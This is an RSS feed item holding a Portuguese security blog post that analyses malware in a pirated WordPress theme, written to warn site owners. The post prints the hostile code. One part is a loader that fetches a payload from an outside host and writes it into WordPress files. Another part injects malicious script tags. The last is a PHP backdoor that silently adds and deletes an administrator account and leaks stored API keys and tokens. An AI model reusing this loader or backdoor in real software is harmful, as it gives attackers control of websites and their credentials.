<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos tema pirata - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/tag/tema-pirata/feed/" rel="self" type="application/rss+xml" />
	<link>https://ethsecurity.com.br/tag/tema-pirata/</link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Mon, 19 Sep 2022 20:26:13 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos tema pirata - ETH SECURITY</title>
	<link>https://ethsecurity.com.br/tag/tema-pirata/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Por que não utilizar temas e plugins piratas.</title>
		<link>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/</link>
					<comments>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Tue, 23 Apr 2019 12:36:32 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[plugin pirata]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[tema nulled]]></category>
		<category><![CDATA[tema pirata]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=209</guid>

					<description><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise. Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise.</p>
<p>Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:</p>
<p>./wp-content/themes/twentynineteen/functions.php<br />
./wp-content/themes/twentyseventeen/functions.php<br />
./wp-content/themes/twentysixteen/functions.php<br />
./wp-includes/post.php<br />
./wp-includes/wp-tmp.php<br />
./wp-includes/wp-vcd.php</p>
<p>Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:</p>
<p>elseif ($tmpcontent = @file_get_contents(&#8220;http://www. harors .pw/code .php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {</p>
<p>if (stripos($tmpcontent, $wp_auth_key) !== false) {<br />
extract(theme_temp_setup($tmpcontent));<br />
@file_put_contents(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;, $tmpcontent);</p>
<p>if (!file_exists(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;)) {<br />
@file_put_contents(get_template_directory() . &#8216;/wp-tmp.php&#8217;, $tmpcontent);<br />
if (!file_exists(get_template_directory() . &#8216;/wp-tmp.php&#8217;)) {<br />
@file_put_contents(&#8216;wp-tmp.php&#8217;, $tmpcontent);</p>
<p>verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:</p>
<p>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;//deloplen .com/ apu.php?zoneid=2542869&#8243; async data-cfasync=&#8221;false&#8221;&gt;&lt;/script&gt;<br />
&lt;script src=&#8221;//pushqwer .com/ ntfc.php?p=2542872&#8243; data-cfasync=&#8221;false&#8221; async&gt;&lt;/script&gt;</p>
<p>Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso &#8220;O site a seguir contém conteúdo malicioso ou enganoso&#8221;.</p>
<p>Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.</p>
<p>Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:</p>
<p>require $_SERVER[&#8216;DOCUMENT_ROOT&#8217;].&#8217;/wp-load.php&#8217;;<br />
$table_name = $wpdb-&gt;get_blog_prefix();<br />
$sample = &#8216;a:1:{s:13:&#8221;administrator&#8221;;b:1;}&#8217;;<br />
if( isset($_GET[&#8216;ok&#8217;]) ) { echo &#8216;&lt;!&#8211; Silence is golden. &#8211;&gt;&#8217;;}<br />
if( isset($_GET[&#8216;awu&#8217;]) ) {<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (&#8216;100010010&#8217;, &#8216;100010010&#8217;, &#8216;\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.&#8217;, &#8216;100010010&#8217;, &#8216;te@ea.st&#8217;, &#8221;, &#8216;2011-06-07 00:00:00&#8217;, &#8221;, &#8216;0&#8217;, &#8216;100010010&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, &#8216;100010010&#8217;, &#8216;{$table_name}capabilities&#8217;, &#8216;{$sample}&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, &#8216;100010010&#8217;, &#8216;{$table_name}user_level&#8217;, &#8217;10&#8217;);&#8221;); }<br />
if( isset($_GET[&#8216;dwu&#8217;]) ) { $wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;users WHERE `ID` = 100010010&#8221;);<br />
$wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;usermeta WHERE $wpdb-&gt;usermeta.`umeta_id` = 100010010&#8221;);}<br />
if( isset($_GET[&#8216;key&#8217;]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo &#8216;&lt;center&gt;&lt;h2&gt;&#8217; . esc_attr( $options[&#8216;user_name&#8217;] . &#8216;:&#8217; . esc_attr( $options[&#8216;api_key&#8217;])) . &#8216;&lt;br&gt;&#8217;;<br />
echo esc_html( envato_market()-&gt;get_option( &#8216;token&#8217; ) ); echo &#8216;&lt;/center&gt;&lt;/h2&gt;&#8217;; }</p>
<p>Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):</p>
<p>| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |</p>
<p>Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.</p>
<h3>Conclusão:</h3>
<p>Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.</p>
<p>Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">209</post-id>	</item>
	</channel>
</rss>
